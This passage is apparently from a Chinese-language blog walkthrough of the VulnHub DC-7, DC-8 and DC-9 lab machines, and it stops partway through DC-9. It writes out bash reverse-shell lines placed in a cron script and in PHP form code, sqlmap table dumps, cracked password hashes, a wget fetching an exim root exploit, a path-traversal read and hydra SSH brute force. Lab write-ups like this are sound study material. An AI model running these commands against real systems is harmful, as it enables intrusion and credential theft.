<p>安装成功，然后在admin账号下开启这个模块</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424205432789.png" class title="image-20260424205432789">

<p>回到编辑界面选择php code选项进行反弹shell</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424205914224.png" class title="image-20260424205914224">

<p>成功拿到web的shell</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424205859099.png" class title="image-20260424205859099">

<p>我们可以去编辑backups.sh文件，由于root会定期执行backups.sh文件，我们只需要往sh文件中再写一个反弹shell的命令即可获得shell</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;bash -i &gt;&amp; /dev/tcp/192.168.164.129/1999 0&gt;&amp;1&#x27;</span> &gt;&gt; /opt/scripts/backups.sh </span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>成功写入，根据定时信息，每15分钟执行一次，等到15即可拿到shell</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424211628666.png" class title="image-20260424211628666">

<p>拿到root的shell，拿到flag</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424211719319.png" class title="image-20260424211719319">





<h2 id="DC-8"><a href="#DC-8" class="headerlink" title="DC-8"></a>DC-8</h2><p>也是Drupal</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424215109895.png" class title="image-20260424215109895">

<p>点击Details下面的各个部分发现跳转到的Url有一个nid参数，对应不同的选项，猜测有sql注入漏洞，发现是数字型参数，然后order by 2报错，存在sql注入漏洞</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260424220120806.png" class title="image-20260424220120806">

<p>直接上sqlmap注入</p>
<div class="code-container" code-lang="Sql"><div class="codebox"><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sqlmap <span class="operator">-</span>u &quot;http://192.168.164.137/?nid=2&quot; <span class="comment">--dbs</span></span><br><span class="line"></span><br><span class="line">sqlmap <span class="operator">-</span>u &quot;http://192.168.164.137/?nid=2&quot; <span class="operator">-</span>D &quot;d7db&quot; <span class="comment">--tables</span></span><br><span class="line"></span><br><span class="line">#数据库中发现users表</span><br><span class="line">sqlmap <span class="operator">-</span>u &quot;http://192.168.164.137/?nid=2&quot; <span class="operator">-</span>D &quot;d7db&quot; <span class="operator">-</span>T &quot;users&quot; <span class="operator">-</span>C &quot;name,pass&quot; <span class="comment">--dump</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>拿到两个用户名和密码</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427145025435.png" class title="image-20260427145025435">

<p>用户名提示我们使用john进行哈希破解</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">admin:$S<span class="variable">$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z</span></span><br><span class="line">john:$S<span class="variable">$DqupvJbxVmqjr6cYePnx2A891ln7lsuku</span>/3if/oRVZJaz5mKC2vF</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后john的密码爆破出来了，意料之中</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427150145704.png" class title="image-20260427150145704">

<p>想着拿到密码之后用ssh去登录，但实际上密码不对。</p>
<p>对网站进行目录扫描，发现<code>/user</code>路由可以进行登录，使用<code>john turtle</code>进行登录</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427150627688.png" class title="image-20260427150627688">

<p>登录进来之后没有什么可以下手的地方，题解说和DC-7靶场一样去找可以写代码的地方去拿shell，也是学到了。去Contact US — Webform — Form setting处可以配置Web界面的表单，其中可以写php代码。</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427152517308.png" class title="image-20260427152517308">

<p>可以选择模板为PHP代码进行解析，和DC-7一样，直接进行反弹shell</p>
<p>然后再在那个表单输入的地方执行代码，但是不知道为什么前面必须要加一个前端代码后面的php代码才会执行</p>
<div class="code-container" code-lang="Php"><div class="codebox"><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;p&gt;LULU&lt;/&gt;</span><br><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">phpinfo</span>();<span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>随便输入一些信息</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427153425939.png" class title="image-20260427153425939">

<p>成功执行phpinfo，由于修改了模板，前端和之前不一样</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427153450563.png" class title="image-20260427153450563">

<p>反弹shell</p>
<div class="code-container" code-lang="Php"><div class="codebox"><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;p&gt;Hello&lt;/&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">system</span>(<span class="string">&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.164.129/4444 0&gt;&amp;1&#x27; &quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>拿到web的shell</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427153817404.png" class title="image-20260427153817404">

<p>接着看下有哪些工具可以用来提权，又发现了熟悉的exim4</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427154722609.png" class title="image-20260427154722609">

<p>查看一下版本然后去搜索提权漏洞</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427154855201.png" class title="image-20260427154855201">

<p>发现多个提权漏洞，其中46996 poc对应的版本符合</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427155044443.png" class title="image-20260427155044443">

<p>在kali上开启Web服务，然后使用Wget在目标机上进行下载</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /tmp</span><br><span class="line">wget http://192.168.164.129:8000/46996.sh</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后查看一下这个脚本的用法，开头就有一个说明函数</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427160406511.png" class title="image-20260427160406511">

<p>两种使用方式，默认的setuid提权失败，只能使用netcat</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">chmod</span> +x 46996.sh</span><br><span class="line">./46996.sh -m netcat</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>成功提权</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427164236821.png" class title="image-20260427164236821">

<p>虽然成功提权了，但是我在这磨蹭了好久，因为这个sh脚本好像是要建立一个通信进行提权，然后连接上了之后就应该执行命令，而我等到通信结束才以为提权结束成功了，导致重复了好几次。</p>
<p>直接读取flag</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427164435583.png" class title="image-20260427164435583">



<h2 id="DC-9"><a href="#DC-9" class="headerlink" title="DC-9"></a>DC-9</h2><p>一个Apache的web服务，并不是什么框架</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427200330944.png" class title="image-20260427200330944">

<p>有一个展示所有信息和搜索功能，很像sql注入漏洞，在Search那里抓包进行测试发现sql注入漏洞</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427200629479.png" class title="image-20260427200629479">

<p>没有过滤，直接继续使用sqlmap</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://192.168.164.138/results.php&quot;</span> --data=<span class="string">&quot;search=moe&quot;</span> -p <span class="string">&quot;search&quot;</span> -D <span class="string">&quot;Staff&quot;</span> -T <span class="string">&quot;Users&quot;</span> --dump</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>拿到admin账号</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427215122967.png" class title="image-20260427215122967">

<p>然后在Manage下使用admin进行登录发现Password错误，看了还是需要哈希破解</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427215158311.png" class title="image-20260427215158311">

<p>使用john进行破解，没有直接破解出来，看来只能抄题解的了</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin transorbital1</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>说真的这个怎么爆的出来啊</p>
<p>登录进入之后在添加信息这里出现了<code>file not exist</code>，猜测有文件包含漏洞，GET传参传入<code>?file=../../../../../etc/passwd</code></p>
<p>成功进行文件包含</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260427220715214.png" class title="image-20260427220715214">

<p>虽然可以进行文件读取可是不知道网站的目录，也没有权限去读取一些重要的文件。</p>
<p>使用nmap去扫描端口，发现ssh的22端口被filtered给过滤了，不是端口没有打开而是把我们的访问包直接给丢弃了，然后第一次扫描的包就被丢弃了看来是所有请求都被丢弃了。</p>
<p>这个时候就属于利用Linux的敲门服务去开启22端口，我们只需要按照配置的端口和顺序去访问靶机的各个端口就可以关闭22端口的filtered，但是只对触发敲门服务的那个ip开启</p>
<p>敲门服务的配置文件在</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/etc/knockd.conf</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>利用文件包含漏洞读取配置信息</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260428105535383.png" class title="image-20260428105535383">

<p>发现三个敲门服务的端口，在kali上使用nc依次访问<code>7469,8475,9842</code>三个端口，我们也可以使用专门用来进行敲门的命令knock</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">knock 192.168.164.138 7469 8475 9842</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后使用nmap尝试访问22端口成功</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260428141642941.png" class title="image-20260428141642941">

<p>但是还需要用户名和密码才能ssh连接，这个时候想到了另外一张表中储存着很多用户名和密码，重新使用sqlmap去注入一下</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://192.168.164.138/results.php&quot;</span> --data=<span class="string">&quot;search=moe&quot;</span> -D <span class="string">&quot;users&quot;</span> -T <span class="string">&quot;UserDetails&quot;</span> --dump --batch</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>拿到用户名和密码</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260428142911278.png" class title="image-20260428142911278">

<p>将用户名和密码分别保存到txt文件中，使用hydra进行爆破</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -L username.txt -P password.txt ssh://192.168.164.138</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>爆破出三个用户</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260428143832420.png" class title="image-20260428143832420">

<p>然后这三个用户几乎是一致的，都没有什么可以利用的工具，但是在第二个用户janitor用户的目录下发现了一个密码txt文件</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>发现其中多了几个密码</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260428145214818.png" class title="image-20260428145214818">

<p>将这几个密码放到之前的密码txt中再进行ssh爆破，然后多爆出了一个用户</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260428145522123.png" class title="image-20260428145522123">

<p>连接ssh之后<code>sudo -l</code>查看可以使用的工具，发现有一个test工具可以无密码执行</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/04/17/vulnhub-DC%E9%80%9A%E5%85%B32/image-20260428150103995.png" class title="image-20260428150103995">

<p>去查看一下这个工具，发现是一个ELF文件，跟着这个路径往上翻，看到一个test.py文件</p>
